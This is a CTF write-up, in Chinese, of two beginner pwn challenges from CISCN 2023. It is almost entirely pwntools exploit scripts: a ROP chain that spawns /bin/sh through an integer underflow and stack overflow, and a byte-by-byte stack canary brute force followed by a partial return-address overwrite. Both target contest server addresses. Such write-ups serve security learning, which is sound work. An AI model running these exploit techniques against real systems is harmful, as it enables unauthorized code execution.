ciscn2023pwn宝宝题解

CS
, ,

坐牢了,只会做baby题

shaokao

整型下溢,然后有个栈溢出,直接用ROPgadget生成ropchain

image-20230528173718539

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
#!/usr/bin/env python2
from pwn import*

context(os = 'linux', arch = 'amd64', log_level = 'debug')
def debug(cmd=''):
	cmd += "b main\n"
	gdb.attach(p, cmd)
	pause()

host = "123.56.251.120"
port = 36293
#pl = process("./shaokao")
pl = remote(host,  port)

# debug()
pl.recvuntil("> ")
pl.sendline("1")
pl.recv()
pl.sendline("1")
pl.recv()
pl.sendline("-1145144")
pl.recvuntil("> ")
pl.sendline("4")
pl.recvuntil("> ")
pl.sendline("5")
pl.recv()


p = b"a"*40

p += p64(0x000000000040a67e) # pop rsi ; ret
p += p64(0x00000000004e60e0) # @ .data
p += p64(0x0000000000458827) # pop rax ; ret
p += b'/bin//sh'
p += p64(0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += p64(0x000000000040a67e) # pop rsi ; ret
p += p64(0x00000000004e60e8) # @ .data + 8
p += p64(0x0000000000447339) # xor rax, rax ; ret
p += p64(0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += p64(0x000000000040264f) # pop rdi ; ret
p += p64(0x00000000004e60e0) # @ .data
p += p64(0x000000000040a67e) # pop rsi ; ret
p += p64(0x00000000004e60e8) # @ .data + 8
p += p64(0x00000000004a404b) # pop rdx ; pop rbx ; ret
p += p64(0x00000000004e60e8) # @ .data + 8
p += p64(0x4141414141414141) # padding
p += p64(0x0000000000447339) # xor rax, rax ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000402404) # syscall
pl.sendline(p)


pl.interactive()

funcanary

fork子进程崩溃不改变canary,利用该性质逐字节爆破canary,发现后门函数,直接覆盖前两位地址,第三位直接猜

image-20230528173814568

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
#!/usr/bin/env python2
from pwn import*

context(os = 'linux', arch = 'amd64', log_level = 'debug')
def debug(cmd=''):
	cmd += "b main\n"
	gdb.attach(p, cmd)
	pause()

host = "123.57.248.214"
port = 25775
#pt = process("./funcanary")
pt = remote(host, port)

pt.recvuntil("welcome\n")
canary = '\x00'
for k in range(7):
    for i in range(256):
        print "the " + str(k) + ": " + chr(i)
        pt.send('a'*(0x70-8) + canary + chr(i))
        a = pt.recvuntil("welcome\n")
        print a
        if "fun" in a:
                canary += chr(i)
                print "canary: " + canary
                break
print "canary: " + canary

pyload = 'a'*(0x70-8) + canary 
pyload += 'b'*8 + '\x28\x02'
pt.send(pyload)
pyload = 'a'*(0x70-8) + canary 
pyload += 'b'*8 + '\x28\x12'
pt.send(pyload)
pyload = 'a'*(0x70-8) + canary 
pyload += 'b'*8 + '\x28\x22'
pt.send(pyload)
pyload = 'a'*(0x70-8) + canary 
pyload += 'b'*8 + '\x28\x32'
pt.send(pyload)
pyload = 'a'*(0x70-8) + canary 
pyload += 'b'*8 + '\x28\x42'
pt.send(pyload)
pyload = 'a'*(0x70-8) + canary 
pyload += 'b'*8 + '\x28\x52'
pt.send(pyload)
pyload = 'a'*(0x70-8) + canary 
pyload += 'b'*8 + '\x28\x62'
pt.send(pyload)
pyload = 'a'*(0x70-8) + canary 
pyload += 'b'*8 + '\x28\x72'
pt.send(pyload)
pyload = 'a'*(0x70-8) + canary 
pyload += 'b'*8 + '\x28\x82'
pt.send(pyload)
pyload = 'a'*(0x70-8) + canary 
pyload += 'b'*8 + '\x28\x92'
pt.send(pyload)
pyload = 'a'*(0x70-8) + canary 
pyload += 'b'*8 + '\x28\xa2'
pt.send(pyload)
pyload = 'a'*(0x70-8) + canary 
pyload += 'b'*8 + '\x28\xb2'
pt.send(pyload)
pyload = 'a'*(0x70-8) + canary 
pyload += 'b'*8 + '\x28\xc2'
pt.send(pyload)
pyload = 'a'*(0x70-8) + canary 
pyload += 'b'*8 + '\x28\xd2'
pt.send(pyload)
pyload = 'a'*(0x70-8) + canary 
pyload += 'b'*8 + '\x28\xe2'
pt.send(pyload)
pyload = 'a'*(0x70-8) + canary 
pyload += 'b'*8 + '\x28\xf2'
pt.send(pyload)


pt.interactive()